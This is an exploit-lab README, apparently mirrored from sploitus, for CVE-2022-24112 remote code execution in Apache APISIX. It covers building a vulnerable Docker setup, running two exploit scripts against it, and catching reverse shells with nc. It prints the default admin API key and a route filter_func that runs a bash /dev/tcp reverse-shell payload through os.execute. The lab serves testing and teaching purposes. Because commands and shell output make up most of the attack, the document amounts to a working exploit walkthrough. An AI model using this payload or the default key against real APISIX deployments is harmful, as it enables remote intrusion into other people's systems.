Share
## https://sploitus.com/exploit?id=84917A44-9615-5FAA-A4D1-665234CD2CCF
# Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
Let's clone using gitclone this repository, then we can navigate to `apisix-docker/examples`. In this `docker-compose.yml` file, we already change into `image: apache/apisix:2.12.0-alpine`, because the vulnerability in this version, then let's install using docker compose.
QuickStart via docker-compose,we can start all modules with docker-compose.
```bash
$ cd example
$ docker-compose -p docker-apisix up -d
```
Let's use this command `docker ps -a` to make sure the docker images already runs in the background. after this is done, we can access the API with a simple `curl`
```bash
$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}
```
- `poc.py`. exploit usage `python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444`
```bash
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
. ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
(CVE-2022-24112)
{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }
```
reverse shell connection
```bash
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
- `poc2.py`. exploit usage `python3 poc2.py -h`
```bash
$ python3 poc2.py -h
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
optional arguments:
-h, --help show this help message and exit
-t TARGET_IP, --rhost TARGET_IP
Target IP
-p TARGET_PORT, --rport TARGET_PORT
Target Port
-L LOCALHOST, --lhost LOCALHOST
Localhost/Local IP
-P LOCALPORT, --lport LOCALPORT
Localport
```
exploit usage `python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444`
```bash
$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
[!] Take RCE
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp
```
```bash
$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
"count": 1,
"action": "get",
"node": {
"key": "/apisix/routes",
"nodes": [
{
"modifiedIndex": 161,
"value": {
"priority": 0,
"uri": "/rms/fzxewh",
"status": 1,
"upstream": {
"hash_on": "vars",
"pass_host": "pass",
"nodes": {
"schmidt-schaefer.com": 1
},
"type": "roundrobin",
"scheme": "http"
},
"id": "index",
"create_time": 1647791428,
"filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
"update_time": 1647799320,
"name": "wthtzv"
},
"key": "/apisix/routes/index",
"createdIndex": 16
}
],
"dir": true
}
}
```
## Credits
- [Apache APISIX Docker - Manual deploy apisix via docker](https://github.com/apache/apisix-docker)
- [Apache APISIX < 2.12.1 Remote Code Execution](https://kavigihan.medium.com/apache-apisix-2-12-1-remote-code-execution-5f920b22ccff)
- [Exploit-DB - Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829)
- [GitHub - Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)